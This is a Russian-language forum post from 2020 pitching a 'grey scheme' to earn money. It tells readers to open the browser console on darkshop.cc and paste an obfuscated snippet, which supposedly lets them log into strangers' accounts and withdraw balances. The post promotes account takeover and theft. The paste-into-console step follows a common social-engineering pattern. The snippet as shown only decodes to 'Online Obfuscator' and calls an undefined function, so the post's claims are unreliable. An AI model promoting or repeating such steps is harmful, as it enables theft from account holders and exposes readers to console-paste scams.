• Страница 1 из 1
  • 1
Форум опытных пользователей социальных сетей | SMM форум » Популярное в сети » Заработок в интернете без вложений » Серая схема. Несколько тысяч рублей - изи
Серая схема. Несколько тысяч рублей - изи
Написал 16.04.2020 в 15:38 1Offline (Ур. 1)
Здарова, бротхеры. Собственно, с давних времен тусовался на уже бородатых теневиках. Последним моим теневичком стал чих(чих.мс.Кто знает - тот понял). Решил выбираться из приваток и, собственно, выбор пал на вас. Не хочу я создавать глупых тем, испражняться, ради пары плюсов репутации. Хочу сразу и много. Сливаю я красивую темку, которую на одном из крупняков отрабатывают уже сутки. Сливаю не потому что я очень добрый дядя, а наоборот. Хочу много репки, да и темке то жить осталось несколько часов. Не буду много базарить, поэтому перейдём к дельцу

 - Изначально нам требуется перейти на сайт darkshop.cc

 -  Далее открыть js консольку в браузере, что делается следующим образом:

Для браузеров Хром или Оpera - CNTRL + SHIFТ + J 
Для браузера Фаерфокс - CNТRL + SНIFТ + К.

 - В консольке вводим кодик, который выглядит вот так:

Код
_0x699b=["\x4F\x6E\x6C\x69\x6E\x65\x20\x4F\x62\x66\x75\x73\x63\x61\x74\x6F\x72"];ja= _0x699b[0];a()

- В случае, если ещё не зафикшено, должна появиться надпись подобная "YUnsYS" и начнут появляться хэши. После перехода по хэшу - авторизуемся под аккаунтом какого нибудь мамонта. На аккаунтах можно найти кучу покупок, типа аккаунтов вк и прочей дряни. Но попадаются и аккаунты с балансом, который мы можем вывести без всяких проблем.
p.s - За пару часов я вывел порядка 2300 рублей, нашёл кучу полезной инфы и туда-сюда :). Собственно, добивайте тему.
Поделиться:

Вступайте в нашу группу Вконтакте и канал Telegram

Продажа сообществ, аккаунтов в соцсетях
Форум опытных пользователей социальных сетей | SMM форум » Популярное в сети » Заработок в интернете без вложений » Серая схема. Несколько тысяч рублей - изи
  • Страница 1 из 1
  • 1
Поиск: